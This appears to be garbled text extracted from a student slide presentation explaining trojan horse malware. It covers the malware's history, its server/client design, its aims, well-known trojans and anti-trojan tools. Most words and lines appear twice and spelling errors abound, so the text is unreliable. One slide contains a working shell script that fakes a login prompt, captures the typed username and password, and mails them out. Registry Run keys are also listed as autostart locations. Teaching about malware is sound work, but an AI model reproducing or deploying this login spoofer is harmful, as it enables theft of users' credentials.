OUTLINEOUTLINE
TROJANTROJAN What is trojan?What is trojan? How did trojan create?How did trojan create? Why was its name trojan?Why was its name trojan?
What is the differences with Trojan and other?What is the differences with Trojan and other? VirusVirus WormWorm TrojanTrojan
Trojan’s structureTrojan’s structure How does trojan run?How does trojan run?
How does trojen affect to operating system and file system?How does trojen affect to operating system and file system? Aim of the trojanAim of the trojan How is it give harm to the systemHow is it give harm to the system Types of trojanTypes of trojan
Protect your computerProtect your computer FirewallFirewall Anti-trojan programsAnti-trojan programs
NetbusterNetbuster Protector PlusProtector Plus
How can be cleanned?How can be cleanned?
Have you got any idea Have you got any idea about TROJAN?about TROJAN?
TROJANTROJAN
ProgrammeProgrammeSeems beneficial Seems beneficial giftgiftDamageDamage
Open/Find portOpen/Find port
Connect SystemConnect System
Control PcControl Pc
Why Why DidDid Trojan Create? Trojan Create?
Work at homeWork at home
19901990
Server – ClientServer – Client
Take DataTake Data
IllegalIllegal
TrojanTrojan Horse Horse
Truva horse was seem like a perfect
and beatifull gift
Something were not normal...
However they lose the war due to this brilliant strategy
DifferencesDifferences
VirusVirus
WormWorm
TrojanTrojan
What do you know about?What do you know about?
VirusVirus
WormWorm
VirusVirus
ProgrammeProgrammeMess theirseft to the Mess theirseft to the programmeprogrammeAttachAttachAttackAttack
HardwareHardwareSoftwareSoftware
WormWorm
ProgrammeProgramme
Attach AutomaticlyAttach Automaticly
Copy themselveCopy themselve
Send theirself without peopleSend theirself without people
TROJANTROJAN
ProgrammeProgramme
Has two partsHas two partsServer (in victams pc)Server (in victams pc)
Client (in hackers pc)Client (in hackers pc)
Trojan
Server.exe
Client.exe
How Does Trojan Work?How Does Trojan Work?
Send Server.exeSend Server.exeAttach to pictures,videos,mailAttach to pictures,videos,mail
Run Client.exeRun Client.exe
Connect computerConnect computer
Manage computer for its aimManage computer for its aim
OPERATING SYSTEMOPERATING SYSTEM&&
FILE SYSTEMFILE SYSTEM
Aim Of TrojanAim Of Trojan
How does it give harm to system ?How does it give harm to system ?
OPERATING SYSTEMOPERATING SYSTEM&&
FILE SYSTEMFILE SYSTEMRobberyRobbery
Net AccountNet Account
PasswordPassword
FileFile
FunFunPhysicalPhysical
SoftwareSoftware
VisualVisual
EspionageEspionage
OPERATING SYSTEMOPERATING SYSTEM&&
FILE SYSTEMFILE SYSTEM
Search FileSearch FileDelete FileDelete FileUse computer as a Use computer as a servantservantLock and Turn off Lock and Turn off WindowsWindows
Access System FileAccess System FileTake passwordTake passwordSend File,Take FileSend File,Take File
ExamplesExamples
ExamplesExamples
ExamplesExamples
ExamplesExamples
#! /bin/sh#! /bin/shclearclearcat /etc/issuecat /etc/issueecho -n "login: "echo -n "login: "read loginread loginecho -n "Password: "echo -n "Password: "stty -echostty -echoread passwdread passwdstty sanestty sanemail $USER <<- finmail $USER <<- finlogin: $loginlogin: $loginpasswd: $passwdpasswd: $passwdfinfinecho "Login incorrect"echo "Login incorrect"sleep 1sleep 1
logoutlogout
Type Of TrojanType Of Trojan
NetbusNetbus
Back ofriceBack ofrice
Girl FriendGirl Friend
Net MonitorNet Monitor
NETBUSNETBUSMost PopularMost Popular
BACK OFRICEBACK OFRICEMost HarmfulMost Harmful
GIRL FRIENDGIRL FRIENDMost DangerousMost Dangerous
NET MONITORNET MONITORSimillar with back NetbusSimillar with back Netbus
Type Of TrojanType Of Trojan
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run Curr entVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run Curr entVersion\Run
PROTECT YOUR COMPUTERPROTECT YOUR COMPUTER
FirewallFirewall
Anti-Trojan programsAnti-Trojan programsNetbusterNetbuster
Protector PlusProtector Plus
FirewallFirewall
Panda Antivirus + Panda Antivirus + FirewallFirewall
Norton Personal FirewallNorton Personal Firewall
NETBUSTERNETBUSTER
Two usage:Two usage:Protect computerProtect computer
Connect hacker’s Connect hacker’s computer and Send computer and Send messagemessage
PROTECT PLUSPROTECT PLUS
Find TrojanFind Trojan
Delete them Delete them
Give ReportGive Report
THANK S FOR LISTENING!THANK S FOR LISTENING!
Top Related